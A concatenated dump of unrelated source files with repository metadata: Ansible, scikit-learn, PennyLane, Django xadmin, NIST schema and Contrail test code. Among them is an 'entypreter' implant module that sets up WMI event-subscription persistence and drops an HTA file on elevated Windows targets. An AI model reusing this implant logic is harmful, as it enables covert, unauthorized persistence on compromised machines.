                                '<attr>',
                                '==',
                                'test'
                            ]
                        }
                    },
                    'api_tag': 0
                },
                {
                    'type': 'integer',
                    'name': 'get used',
                    'api_tag': 0
                },
                {
                    'type': 'integer',
                    'name': 'loadsub',
                    'api_tag': 0
                },
                {
                    'name': 'option',
                    'type': 'dict',
                    'dict': {
                        'type': 'string',
                        'enum': [
                            'count',
                            'object member',
                            'datasrc',
                            'get reserved',
                            'syntax'
                        ]
                    },
                    'api_tag': 0
                },
                {
                    'name': 'range',
                    'type': 'dict',
                    'dict': {
                        'type': 'array',
                        'items': {
                            'type': 'integer',
                            'example': [
                                2,
                                5
                            ]
                        }
                    },
                    'api_tag': 0
                },
                {
                    'name': 'sortings',
                    'type': 'dict',
                    'dict': {
                        'type': 'array',
                        'items': {
                            '{attr_name}': {
                                'type': 'integer',
                                'enum': [
                                    1,
                                    -1
                                ]
                            }
                        }
                    },
                    'api_tag': 0
                },
                {
                    'type': 'string',
                    'name': 'url',
                    'api_tag': 0
                }
            ]
        },
        # Which schema object validates each request method.
        'method_mapping': {
            'add': 'object0',
            'get': 'object1',
            'set': 'object0',
            'update': 'object0'
        }
    }

    # Ansible-facing argument specification (validated by AnsibleModule).
    module_arg_spec = {
        'loose_validation': {
            'type': 'bool',
            'required': False,
            'default': False
        },
        'workspace_locking_adom': {
            'type': 'str',
            'required': False
        },
        'workspace_locking_timeout': {
            'type': 'int',
            'required': False,
            'default': 300
        },
        'params': {
            'type': 'list',
            'required': False
        },
        'method': {
            'type': 'str',
            'required': True,
            'choices': [
                'add',
                'get',
                'set',
                'update'
            ]
        },
        'url_params': {
            'type': 'dict',
            'required': False
        }
    }
    module = AnsibleModule(argument_spec=module_arg_spec,
                           supports_check_mode=False)
    method = module.params['method']
    loose_validation = module.params['loose_validation']

    fmgr = None
    payload = None
    response = DEFAULT_RESULT_OBJ

    # The module only works over a persistent connection (httpapi plugin);
    # without a socket path there is no FortiManager session to talk to.
    if module._socket_path:
        connection = Connection(module._socket_path)
        tools = FMGRCommon()
        # Body-schema validation is skipped when loose_validation is set;
        # URL parameters are always validated.
        if loose_validation is False:
            tools.validate_module_params(module, body_schema)
        tools.validate_module_url_params(module, jrpc_urls, url_schema)
        full_url = tools.get_full_url_path(module, jrpc_urls)
        payload = tools.get_full_payload(module, full_url)
        fmgr = FortiManagerHandler(connection, module)
        fmgr.tools = tools
    else:
        module.fail_json(**FAIL_SOCKET_MSG)

    try:
        response = fmgr._conn.send_request(method, payload)
        fmgr.govern_response(module=module, results=response,
                             msg='Operation Finished',
                             ansible_facts=fmgr.construct_ansible_facts(response, module.params, module.params))
    except Exception as e:
        raise FMGBaseException(e)

    module.exit_json(meta=response[1])


if __name__ == '__main__':
    main()
| [
"dc.anh.doan@gmail.com"
] | dc.anh.doan@gmail.com |
def classify(features_train, labels_train):
    """Train and return a Gaussian Naive Bayes classifier.

    Fits sklearn's GaussianNB on the supplied training features and labels
    and returns the fitted estimator.
    """
    from sklearn.naive_bayes import GaussianNB

    classifier = GaussianNB()
    classifier.fit(features_train, labels_train)
    return classifier
| [
"behzad najafi"
] | behzad najafi |
56b9b013459a210acff98b7470550bbd6915a1d0 | 7c0d8d030c27472c3cdd3f5696fb423f7cb579af | /pennylane/gradients/gradient_transform.py | f9536c451198d537395f243393cfb28d00a86d28 | [
"Apache-2.0"
] | permissive | stjordanis/pennylane | 6a696914244336cdad4d68bbcc668924eeaf1bf6 | 755b2419ea2e956d864237b9b18f3a3ca27cdf4f | refs/heads/master | 2023-05-10T23:10:56.891830 | 2023-05-03T21:09:32 | 2023-05-03T21:09:32 | 175,742,678 | 1 | 0 | null | 2019-03-15T03:32:26 | 2019-03-15T03:32:25 | null | UTF-8 | Python | false | false | 17,633 | py | # Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains utilities for defining custom gradient transforms,
including a decorator for specifying gradient expansions."""
# pylint: disable=too-few-public-methods
import warnings
import pennylane as qml
from pennylane.transforms.tape_expand import expand_invalid_trainable
# Keyword arguments recognized by the built-in gradient transforms; used to
# validate/filter gradient kwargs passed through to a transform.
SUPPORTED_GRADIENT_KWARGS = [
    "approx_order",
    "argnum",
    "aux_wire",
    "broadcast",  # [TODO: This is in param_shift. Unify with use_broadcasting in stoch_pulse_grad
    "device_wires",
    "diagonal_shifts",
    "f0",
    "force_order2",
    "gradient_recipes",
    "gradient_kwargs",
    "h",
    "n",
    "num",
    "num_directions",
    "num_split_times",
    "off_diagonal_shifts",
    "order",
    "reduction",
    "sampler",
    "sampler_seed",
    "shifts",
    "shots",
    "strategy",
    "use_broadcasting",
    "validate_params",
]
def gradient_analysis(tape, use_graph=True, grad_fn=None):
    """Update the parameter information dictionary of the tape with
    gradient information of each parameter.

    Parameter gradient methods include:

    * ``None``: the parameter does not support differentiation.

    * ``"0"``: the variational circuit output does not depend on this
      parameter (the partial derivative is zero).

    In addition, the operator might define its own grad method
    via :attr:`.Operator.grad_method`.

    Note that this function modifies the input tape in-place.

    Args:
        tape (.QuantumTape): the quantum tape to analyze
        use_graph (bool): whether to use a directed-acyclic graph to determine
            if the parameter has a gradient of 0
        grad_fn (None or callable): The gradient transform performing the analysis.
            This is an optional argument; if provided, and the tape has already
            been analyzed for the gradient information by the same gradient transform,
            the cached gradient analysis will be used.
    """
    # pylint:disable=protected-access
    if grad_fn is not None:
        if getattr(tape, "_gradient_fn", None) is grad_fn:
            # gradient analysis has already been performed on this tape
            return
        # Remember which transform analyzed the tape, for the cache check above.
        tape._gradient_fn = grad_fn

    for idx, info in enumerate(tape._par_info):
        if idx not in tape.trainable_params:
            # non-trainable parameters do not require a grad_method
            info["grad_method"] = None
        else:
            op = tape._par_info[idx]["op"]

            if not qml.operation.has_grad_method(op):
                # no differentiation method is registered for this operation
                info["grad_method"] = None
            elif (tape._graph is not None) or use_graph:
                if not any(tape.graph.has_path(op, ob) for ob in tape.observables):
                    # there is no influence of this operation on any of the observables
                    info["grad_method"] = "0"
                    continue

            # NOTE(review): this assignment runs after the if/elif chain unless
            # the `continue` above fired — so it also re-assigns op.grad_method
            # for ops without a registered grad method. That appears to rely on
            # op.grad_method being None in that case; confirm intended.
            info["grad_method"] = op.grad_method
def grad_method_validation(method, tape):
    """Check that the requested Jacobian method is compatible with the tape's
    trainable parameters, and return their gradient methods.

    The tape is expected to already carry per-parameter gradient information
    (a ``"grad_method"`` entry in each parameter-info record).

    Args:
        method (str): the overall Jacobian differentiation method
        tape (.QuantumTape): the tape with associated parameter information

    Raises:
        ValueError: if any trainable parameter is non-differentiable, or if
            ``method`` is ``"analytic"`` while some trainable parameter only
            supports numeric differentiation

    Returns:
        tuple[str, None]: the allowed parameter gradient methods for each
        trainable parameter
    """
    # pylint: disable=protected-access
    # Collect the gradient method of every trainable parameter, in tape order.
    diff_methods = {}
    for par_idx, par_info in enumerate(tape._par_info):
        if par_idx in tape.trainable_params:
            diff_methods[par_idx] = par_info["grad_method"]

    # A parameter whose gradient method is None cannot be differentiated at all.
    nondiff_params = {idx for idx, g in diff_methods.items() if g is None}
    if nondiff_params:
        raise ValueError(f"Cannot differentiate with respect to parameter(s) {nondiff_params}")

    # Analytic mode additionally rules out numeric-only ("F") parameters.
    numeric_params = {idx for idx, g in diff_methods.items() if g == "F"}
    if method == "analytic" and numeric_params:
        raise ValueError(
            f"The analytic gradient method cannot be used with the parameter(s) {numeric_params}."
        )

    return tuple(diff_methods.values())
def choose_grad_methods(diff_methods, argnum):
    """Map the trainable-parameter indices selected by ``argnum`` to their
    differentiation methods.

    When ``argnum`` selects fewer parameters than the total number of
    trainable parameters, only the selected ones contribute to the Jacobian.

    Args:
        diff_methods (list): the ordered list of differentiation methods
            for each parameter
        argnum (int, list(int), None): Indices for argument(s) with respect
            to which to compute the Jacobian; ``None`` selects all of them.

    Returns:
        dict: map of the trainable parameter indices and
        differentiation methods
    """
    if argnum is None:
        # No restriction requested: keep every parameter, in order.
        return dict(enumerate(diff_methods))

    # Normalize a single index to a one-element list.
    indices = [argnum] if isinstance(argnum, int) else argnum

    if len(indices) == 0:
        warnings.warn(
            "No trainable parameters were specified for computing the Jacobian.",
            UserWarning,
        )
        return {}

    return {index: diff_methods[index] for index in indices}
class gradient_transform(qml.batch_transform):
    """Decorator for defining quantum gradient transforms.

    Quantum gradient transforms are a specific case of :class:`~.batch_transform`.
    All quantum gradient transforms accept a tape, and output
    a batch of tapes to be independently executed on a quantum device, alongside
    a post-processing function that returns the result.

    Args:
        expand_fn (function): An expansion function (if required) to be applied to the
            input tape before the gradient computation takes place. If not provided,
            the default expansion function simply expands all operations that
            have ``Operation.grad_method=None`` until all resulting operations
            have a defined gradient method.
        differentiable (bool): Specifies whether the gradient transform is differentiable or
            not. A transform may be non-differentiable if it does not use an
            autodiff framework for its tensor manipulations. In such a case, setting
            ``differentiable=False`` instructs the decorator
            to mark the output as 'constant', reducing potential overhead.
        hybrid (bool): Specifies whether classical processing inside a QNode
            should be taken into account when transforming a QNode.

            - If ``True``, and classical processing is detected and this
              option is set to ``True``, the Jacobian of the classical
              processing will be computed and included. When evaluated, the
              returned Jacobian will be with respect to the QNode arguments.

            - If ``False``, any internal QNode classical processing will be
              **ignored**. When evaluated, the returned Jacobian will be with
              respect to the **gate** arguments, and not the QNode arguments.

    Supported gradient transforms must be of the following form:

    .. code-block:: python

        @gradient_transform
        def my_custom_gradient(tape, argnum=None, **kwargs):
            ...
            return gradient_tapes, processing_fn

    where:

    - ``tape`` (*QuantumTape*): the input quantum tape to compute the gradient of

    - ``argnum`` (*int* or *list[int]* or *None*): Which trainable parameters of the tape
      to differentiate with respect to. If not provided, the derivatives with respect to all
      trainable inputs of the tape should be returned (``tape.trainable_params``).

    - ``gradient_tapes`` (*list[QuantumTape]*): is a list of output tapes to be evaluated.
      If this list is empty, no quantum evaluations will be made.

    - ``processing_fn`` is a processing function to be applied to the output of the evaluated
      ``gradient_tapes``. It should accept a list of numeric results with length ``len(gradient_tapes)``,
      and return the Jacobian matrix.

    Once defined, the quantum gradient transform can be used as follows:

    >>> gradient_tapes, processing_fn = my_custom_gradient(tape, *gradient_kwargs)
    >>> res = execute(tapes, dev, interface="autograd", gradient_fn=qml.gradients.param_shift)
    >>> jacobian = processing_fn(res)

    Alternatively, gradient transforms can be applied directly to QNodes,
    in which case the execution is implicit:

    >>> fn = my_custom_gradient(qnode, *gradient_kwargs)
    >>> fn(weights) # transformed function takes the same arguments as the QNode
    1.2629730888100839

    .. note::

        The input tape might have parameters of various types, including
        NumPy arrays, JAX Arrays, and TensorFlow and PyTorch tensors.

        If the gradient transform is written in a autodiff-compatible manner, either by
        using a framework such as Autograd or TensorFlow, or by using ``qml.math`` for
        tensor manipulation, then higher-order derivatives will also be supported.

        Alternatively, you may use the ``tape.unwrap()`` context manager to temporarily
        convert all tape parameters to NumPy arrays and floats:

        >>> with tape.unwrap():
        ...     params = tape.get_parameters()  # list of floats
    """

    def __init__(
        self, transform_fn, expand_fn=expand_invalid_trainable, differentiable=True, hybrid=True
    ):
        # ``hybrid`` controls whether the classical Jacobian of in-QNode
        # processing is chained onto the quantum Jacobian (see class docstring).
        self.hybrid = hybrid
        super().__init__(transform_fn, expand_fn=expand_fn, differentiable=differentiable)

    def default_qnode_wrapper(self, qnode, targs, tkwargs):  # pylint: disable=too-many-statements
        # Here, we overwrite the QNode execution wrapper in order
        # to take into account that classical processing may be present
        # inside the QNode.
        hybrid = tkwargs.pop("hybrid", self.hybrid)
        _wrapper = super().default_qnode_wrapper(qnode, targs, tkwargs)

        def jacobian_wrapper(
            *args, **kwargs
        ):  # pylint: disable=too-many-return-statements, too-many-branches, too-many-statements
            argnum = tkwargs.get("argnum", None)
            argnums = tkwargs.get("argnums", None)

            interface = qml.math.get_interface(*args)
            trainable_params = qml.math.get_trainable_indices(args)

            # JAX uses ``argnums`` rather than trainability markers on the
            # arguments; ``argnum`` is accepted but deprecated there.
            if interface == "jax" and argnum:
                warnings.warn(
                    "argnum is deprecated with the Jax interface. You should use argnums instead."
                )
                tkwargs.pop("argnum")
                argnums = argnum

            if interface == "jax" and not trainable_params:
                # Translate the requested argnums into tape trainable indices.
                if argnums is None:
                    argnums_ = [0]
                else:
                    argnums_ = [argnums] if isinstance(argnums, int) else argnums

                params = qml.math.jax_argnums_to_tape_trainable(
                    qnode, argnums_, self.expand_fn, args, kwargs
                )
                argnums_ = qml.math.get_trainable_indices(params)
                kwargs["argnums"] = argnums_
            elif not trainable_params:
                warnings.warn(
                    "Attempted to compute the gradient of a QNode with no trainable parameters. "
                    "If this is unintended, please add trainable parameters in accordance with "
                    "the chosen auto differentiation framework."
                )
                return ()

            # Quantum Jacobian: derivative of the tape results with respect to
            # the gate arguments (see the ``hybrid`` docs above).
            qjac = _wrapper(*args, **kwargs)

            if not hybrid:
                return qjac

            kwargs.pop("shots", False)

            # Special case where we apply a Jax transform (jacobian e.g.) on the gradient transform and argnums are
            # defined on the outer transform and therefore on the args.
            if interface == "jax":
                argnum_cjac = trainable_params or argnums
            else:
                argnum_cjac = None

            # Classical Jacobian: derivative of the gate arguments with
            # respect to the QNode arguments.
            cjac = qml.transforms.classical_jacobian(
                qnode, argnum=argnum_cjac, expand_fn=self.expand_fn
            )(*args, **kwargs)

            if qml.active_return():
                if isinstance(cjac, tuple) and len(cjac) == 1:
                    cjac = cjac[0]

                if not isinstance(cjac, tuple):
                    is_square = cjac.ndim == 2 and cjac.shape[0] == cjac.shape[1]

                    if not qml.math.is_abstract(cjac):
                        if is_square and qml.math.allclose(cjac, qml.numpy.eye(cjac.shape[0])):
                            # Classical Jacobian is the identity. No classical processing
                            # is present inside the QNode.
                            return qjac

                multi_meas = len(qnode.tape.measurements) > 1

                if multi_meas:
                    multi_params = isinstance(cjac, tuple) or isinstance(qjac[0], tuple)
                else:
                    multi_params = isinstance(cjac, tuple) or isinstance(qjac, tuple)

                # Single measurement, single parameter: one tensor contraction.
                if not multi_params and not multi_meas:
                    if qjac.shape == ():
                        qjac = qml.math.reshape(qjac, (1,))
                    # With dimension e.g. probs
                    else:
                        qjac = qml.math.reshape(qjac, (1, -1))

                    return qml.math.tensordot(qjac, cjac, [[0], [0]])

                # Multiple measurements, single parameter: contract each
                # measurement's quantum Jacobian with the classical one.
                if multi_meas and not multi_params:
                    jacs = tuple(
                        qml.math.tensordot(qml.math.reshape(q, (1,)), cjac, [[0], [0]])
                        if q.shape == ()
                        else qml.math.tensordot(qml.math.reshape(q, (1, -1)), cjac, [[0], [0]])
                        for q in qjac
                    )
                    return jacs
                # Single measurement, multiple parameters.
                if not multi_meas and multi_params:
                    if not isinstance(cjac, tuple):
                        jacs = qml.math.tensordot(
                            qml.math.stack(qjac), qml.math.stack(cjac), [[0], [0]]
                        )
                    else:
                        jacs = tuple(
                            qml.math.tensordot(qml.math.stack(qjac), c, [[0], [0]])
                            for c in cjac
                            if c is not None
                        )
                    return jacs
                # Multi measurement and multi params
                if not isinstance(cjac, tuple):
                    jacs = tuple(
                        qml.math.tensordot(qml.math.stack(q), qml.math.stack(cjac), [[0], [0]])
                        for q in qjac
                    )
                else:
                    jacs = tuple(
                        tuple(
                            qml.math.tensordot(qml.math.stack(q), c, [[0], [0]])
                            for c in cjac
                            if c is not None
                        )
                        for q in qjac
                    )
                return jacs

            # Legacy (non active_return) path below.
            if isinstance(cjac, tuple):
                # Classical processing of multiple arguments is present. Return qjac @ cjac.
                jacs = tuple(
                    qml.math.tensordot(qjac, c, [[-1], [0]]) for c in cjac if c is not None
                )
                if len(jacs) == 1:
                    return jacs[0]
                return jacs

            is_square = cjac.ndim == 2 and cjac.shape[0] == cjac.shape[1]

            if is_square and qml.math.allclose(cjac, qml.numpy.eye(cjac.shape[0])):
                # Classical Jacobian is the identity. No classical processing
                # is present inside the QNode.
                return qjac

            return qml.math.tensordot(qjac, cjac, [[-1], [0]])

        return jacobian_wrapper
| [
"noreply@github.com"
] | stjordanis.noreply@github.com |
14961a035531cf4e9da1f2cb7f06758d31a3e389 | f33808410c0ad3a16099a81a130b8e2c25d4e641 | /modules/implant/persist/wmi.py | ef97800b0a0e03e908338e62b90d11b3e0725904 | [
"Apache-2.0"
] | permissive | marciopocebon/entypreter | 96994ec6a6e35f4b31bf1b16aeff29b75c7b5bc3 | 6a165589c4853c33e7f5eb6fd3a1326bfc37870e | refs/heads/master | 2020-09-05T06:54:31.674617 | 2019-11-05T13:48:35 | 2019-11-05T13:48:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,937 | py | import core.job
import core.implant
import core.loader
import uuid
import string
import random
class WMIPersistJob(core.job.Job):
    """Job that installs persistence on the target via a WMI event
    subscription (an __EventFilter / CommandLineEventConsumer /
    __FilterToConsumerBinding triple named "Entypreter") plus a dropped
    HTA payload file."""

    def create(self):
        """Validate the session and prepare the job options.

        Returns False (after reporting an error) when the session cannot
        support this technique; otherwise fills in the payload command and
        the escaped drop paths/filenames used by the implant script.
        """
        # Pre-flight: this technique needs an interactive, elevated session.
        if self.session_id == -1:
            self.error("0", "This job is not yet compatible with ONESHOT stagers.", "ONESHOT job error.", "")
            return False
        if self.session.elevated != 1:
            self.error("0", "This job requires an elevated session.", "Not elevated!", "")
            return False

        id = self.options.get("PAYLOAD")
        payload = self.load_payload(id)
        self.options.set("CMD", payload)
        # Escape backslashes and quotes so the paths survive being embedded
        # inside the generated script's string literals.
        self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"'))
        self.options.set("FDROPDIR", self.options.get('DROPDIR').replace("\\", "\\\\").replace('"', '\\"'))

        if self.options.get('DROPFILE'):
            self.options.set('FDROPFILE', self.options.get('DROPFILE')+'.hta')
        else:
            # No name supplied: generate a random 10-letter basename.
            self.options.set('DROPFILE', ''.join(random.choice(string.ascii_uppercase) for _ in range(10)))
            self.options.set('FDROPFILE', self.options.get('DROPFILE')+'.hta')

    def report(self, handler, data, sanitize = False):
        """Handle callbacks from the implant.

        Dispatches on the ``Task`` HTTP header reported by the implant
        (one branch per persistence step) and on the ``X-UploadFileJob``
        header, which requests the HTA dropper file itself.
        """
        task = handler.get_header("Task", False)
        upload = handler.get_header('X-UploadFileJob', False)

        # The implant asks for the HTA dropper: render it from the local
        # template and stream it back as a binary download.
        if upload == "true":
            dropper_script = core.loader.load_script(self.options.get("LDROPFILE"), self.options)
            template = core.loader.load_script("data/stager/js/mshta/template.hta")
            fdata = handler.post_process_script(dropper_script, template, self.options, self.session, False)
            headers = {}
            headers['Content-Type'] = 'application/octet-stream'
            headers['Content-Length'] = len(fdata)
            handler.reply(200, fdata, headers)
            return

        data = data.decode()

        # Each step reports a truthy/falsy result string; on success we print
        # the matching manual cleanup command for the operator.
        if task == "CreateFilter":
            handler.reply(200)
            if data:
                self.shell.print_good("__EventFilter created!")
                self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"Entypreter\" DELETE")
            else:
                self.shell.print_error("__EventFilter could not be created, this implant will probably fail :/")
            return

        if task == "CreateConsumer":
            handler.reply(200)
            if data:
                self.shell.print_good("CommandLineEventConsumer created!")
                self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"Entypreter\" DELETE")
            else:
                self.shell.print_error("CommandLineEventConsumer could not be created, this implant will probably fail :/")
            return

        if task == "CreateBinding":
            handler.reply(200)
            if data:
                self.shell.print_good("__FilterToConsumerBinding created! Persistence has been established! If the target reboots, a session should come back 4-5 minutes later :)")
                self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE \"__PATH like '%Entypreter%'\" DELETE")
            else:
                self.shell.print_error("__FilterToConsumerBinding could not be created, this implant will probably fail :/")
            return

        if task == "RemovePersistence":
            handler.reply(200)
            if data:
                self.shell.print_good("Persistence removed successfully.")
            else:
                # Removal failed: show all three manual cleanup commands.
                self.shell.print_error("Could not remove persistence :/")
                self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"Entypreter\" DELETE")
                self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"Entypreter\" DELETE")
                self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE \"__PATH like '%Entypreter%'\" DELETE")
            return

        # Dropper results arrive as "<bool>~~~<path> ..." separated by "~~~".
        if task == "AddDropper":
            handler.reply(200)
            if "true" in data.split("~~~")[0]:
                self.shell.print_good("HTA file dropped at "+data.split("~~~")[1].split()[0])
                self.shell.print_command("del /f "+data.split("~~~")[1].split()[0])
            else:
                self.shell.print_error("HTA file could not be dropped. Consider cleaning up and choosing a different DROPDIR.")
            return

        if task == "DeleteDropper":
            handler.reply(200)
            # "false" here means the file no longer exists, i.e. deletion worked.
            if "false" in data.split("~~~")[0]:
                self.shell.print_good("HTA file deleted from "+data.split("~~~")[1].split()[0])
            else:
                self.shell.print_error("HTA file could not be deleted.")
                self.shell.print_command("del /f "+data.split("~~~")[1].split()[0])
            return

        if data == "Complete":
            super(WMIPersistJob, self).report(handler, data)
        handler.reply(200)

    def done(self):
        self.results = "Completed!"
        self.display()

    def display(self):
        # self.shell.print_plain(self.data)
        pass
class WMIPersistImplant(core.implant.Implant):
    """Implant module that sets up WMI-subscription persistence;
    delegates callback handling to :class:`WMIPersistJob`."""

    NAME = "WMI Persistence"
    DESCRIPTION = "Creates persistence using a WMI subscription."
    AUTHORS = ["Entynetproject"]
    STATE = "implant/persist/wmi"

    def load(self):
        """Register the user-configurable options for this implant."""
        self.options.register("PAYLOAD", "", "Payload to stage.")
        # CMD is filled in by the job from the loaded payload; not user-facing.
        self.options.register("CMD", "", "Command.", hidden=True)
        self.options.register("CLEANUP", "false", "Will remove the created user.", enum=["true", "false"])
        self.options.register("DIRECTORY", "%TEMP%", "Writeable directory for output.", required=False)
        self.options.register("LDROPFILE", "data/implant/persist/wmi.dropper", "Local file to drop on the target.", advanced=True)
        self.options.register("DROPDIR", "%ALLUSERSPROFILE%", "Directory to place the drop file.", advanced=True)
        # FDROPDIR/FDROPFILE hold the escaped forms computed by the job.
        self.options.register("FDROPDIR", "", "", hidden=True)
        self.options.register("RETRYATTEMPTS", "5", "Number of times to retry calling back before self-terminating (-1 == infinite).")
        self.options.register("RETRYDELAY", "60", "Seconds between retry attempts.")
        self.options.register("DROPFILE", "", "Name to give the drop file (randomly generated if no name).", advanced=True)
        self.options.register("FDROPFILE", "", "", hidden=True)

    def job(self):
        """Return the job class used to track this implant's callbacks."""
        return WMIPersistJob

    def run(self):
        """Resolve the payload and dispatch the JS implant to the target."""
        id = self.options.get("PAYLOAD")
        payload = self.load_payload(id)

        if payload is None:
            self.shell.print_error("Payload %s not found." % id)
            return

        payloads = {}
        payloads["js"] = "data/implant/persist/wmi.js"

        self.dispatch(payloads, self.job)
| [
"noreply@github.com"
] | marciopocebon.noreply@github.com |
8368bfbd0e4777b5c99e341ea7c5c3253dd539f6 | 0626949c68622a787fa5d860d654c862676a77e7 | /muxue/user/adminx.py | 7bff5abe2de350bb8bce165760789b265e48d5c5 | [] | no_license | GBXZ/muxueonline | 37f74d51a9d275bde62197addf3f08ac517a52b8 | bf9af33d65a960e6ac9e796587c3ed9cdceba25d | refs/heads/master | 2020-03-26T22:39:15.556180 | 2018-09-28T23:38:55 | 2018-09-28T23:38:55 | 145,477,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,315 | py | # _*_ coding:utf-8 _*_
from django.contrib import admin
from .models import EmailVerifyRecord,Banner
from django.db import models
from datetime import datetime
import xadmin #重要
from xadmin import views #修改主题需要导入views
class BaseSetting(object): # xadmin theme settings
    # Enable theme switching in the admin UI and load the Bootswatch
    # theme catalogue so additional themes are selectable.
    enable_themes = True
    use_bootswatch = True
class GlobalSettings(object): # customizes the xadmin header and footer text
    site_title = "慕学后台管理系统"  # page header title ("Muxue admin system")
    site_footer = "慕学在线网"  # page footer text ("Muxue online")
    menu_style = "accordion"  # collapse the left-hand menu into an accordion
class EmailVerifyRecordAdmin(object):
    # Admin options for EmailVerifyRecord in xadmin.
    list_display = ["code","email","send_type","send_time"] # columns shown in the change list
    search_fields = ["code","email","send_type"] # fields covered by the search box
    list_filter = ["code","email","send_type","send_time"] # sidebar filters
class BannerAdmin(object):
    # Admin options for Banner in xadmin.
    list_display = ["title","image","url","index","add_time"] # columns shown in the change list
    search_fields = ["title","image","url","index"] # fields covered by the search box
    list_filter = ["title","image","url","index","add_time"] # sidebar filters
# Register the models with xadmin together with their option classes.
xadmin.site.register(EmailVerifyRecord,EmailVerifyRecordAdmin)
xadmin.site.register(Banner,BannerAdmin)
xadmin.site.register(views.BaseAdminView,BaseSetting) # applies the theme settings above
xadmin.site.register(views.CommAdminView,GlobalSettings) # applies the header/footer settings above
# Register your models here.
| [
"="
] | = |
0e5d6f781d7332442b268007501ec4e99b025beb | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/unsignedInt/Schema+Instance/NISTXML-SV-IV-list-unsignedInt-whiteSpace-1-5.py | 4139e151403a4f62685e832b8f9ab13a90d624e4 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 456 | py | from output.models.nist_data.list_pkg.unsigned_int.schema_instance.nistschema_sv_iv_list_unsigned_int_white_space_1_xsd.nistschema_sv_iv_list_unsigned_int_white_space_1 import NistschemaSvIvListUnsignedIntWhiteSpace1
# Generated NIST conformance fixture: a list of xs:unsignedInt values
# covering both type boundaries (0 and 4294967295) plus mid-range samples.
obj = NistschemaSvIvListUnsignedIntWhiteSpace1(
    value=[
        0,
        561145125,
        4003068322,
        3467607955,
        1588590776,
        1695804895,
        736059152,
        4016801897,
        4294967295,
    ]
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
d8503c891c61ca578f7de87638d0b8b2ee588861 | 4a307849ed4dded5ce84b0ceb6d2cf56c2e64b89 | /fixtures/physical_router_fixture.py | 2735390c29f1263942639fc49bf7dfc581280ae3 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | lmadhusudhanan/contrail-test | a6316b41dcb836315d25503f1dee511943d7f976 | bd39ff19da06a20bd79af8c25e3cde07375577cf | refs/heads/master | 2022-05-04T20:01:58.960911 | 2018-06-27T17:56:47 | 2018-06-27T17:56:47 | 138,913,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,453 | py | from netaddr import *
import vnc_api_test
from pif_fixture import PhysicalInterfaceFixture
from physical_device_fixture import PhysicalDeviceFixture
class PhysicalRouterFixture(PhysicalDeviceFixture):
    '''Fixture to manage Physical Router objects

    Creates/looks up the router's BGP-router object in the ip-fabric
    routing instance during setUp and binds it to the physical device;
    cleanUp removes it again unless it pre-existed.

    Mandatory:
    :param name   : name of the device
    :param mgmt_ip  : Management IP

    Optional:
    :param vendor : juniper
    :param model  : mx
    :param asn    : default is 64512
    :param ssh_username : Login username to ssh, default is root
    :param ssh_password : Login password, default is Embe1mpls
    :param tunnel_ip : Tunnel IP (for vtep), defaults to mgmt_ip
    :param ports : List of Ports which are available to use

    Inherited optional parameters:
    :param domain   : default is default-domain
    :param project_name  : default is admin
    :param cfgm_ip  : default is 127.0.0.1
    :param api_port : default is 8082
    :param connections   : ContrailConnections object. default is None
    :param username : default is admin
    :param password : default is contrail123
    :param auth_server_ip : default is 127.0.0.1
    '''
    def __init__(self, *args, **kwargs):
        # NOTE(review): `self` is also passed as an explicit positional
        # argument here, so the parent receives it twice -- looks like a
        # bug; confirm against PhysicalDeviceFixture.__init__ before
        # changing, since the parent may tolerate/consume it.
        super(PhysicalRouterFixture, self).__init__(self, *args, **kwargs)
        self.name = args[0]
        self.mgmt_ip = args[1]
        self.vendor = kwargs.get('vendor', 'juniper')
        self.model = kwargs.get('model','mx')
        self.asn = kwargs.get('asn','64512')
        # Tunnel (VTEP) address defaults to the management address.
        self.tunnel_ip = kwargs.get('tunnel_ip', self.mgmt_ip)
        self.ports = kwargs.get('ports', [])
        self.bgp_router = None
        self.bgp_router_already_present = False
        try:
            # Best-effort: the WebUI helper is only needed for GUI-driven
            # runs, so any failure here is deliberately ignored.
            if self.inputs.verify_thru_gui():
                from webui_test import WebuiTest
                self.webui = WebuiTest(self.connections, self.inputs)
                self.kwargs = kwargs
        except Exception as e:
            pass
    # end __init__
    def create_bgp_router(self):
        # Create a BgpRouter object for this device under the ip-fabric
        # routing instance and return the freshly read-back object.
        bgp_router = vnc_api_test.BgpRouter(self.name, parent_obj=self._get_ip_fabric_ri_obj())
        params = vnc_api_test.BgpRouterParams()
        params.address = self.tunnel_ip
        params.address_families = vnc_api_test.AddressFamilies(['route-target',
            'inet-vpn', 'e-vpn', 'inet6-vpn'])
        params.autonomous_system = int(self.asn)
        params.vendor = self.vendor
        params.identifier = self.mgmt_ip
        bgp_router.set_bgp_router_parameters(params)
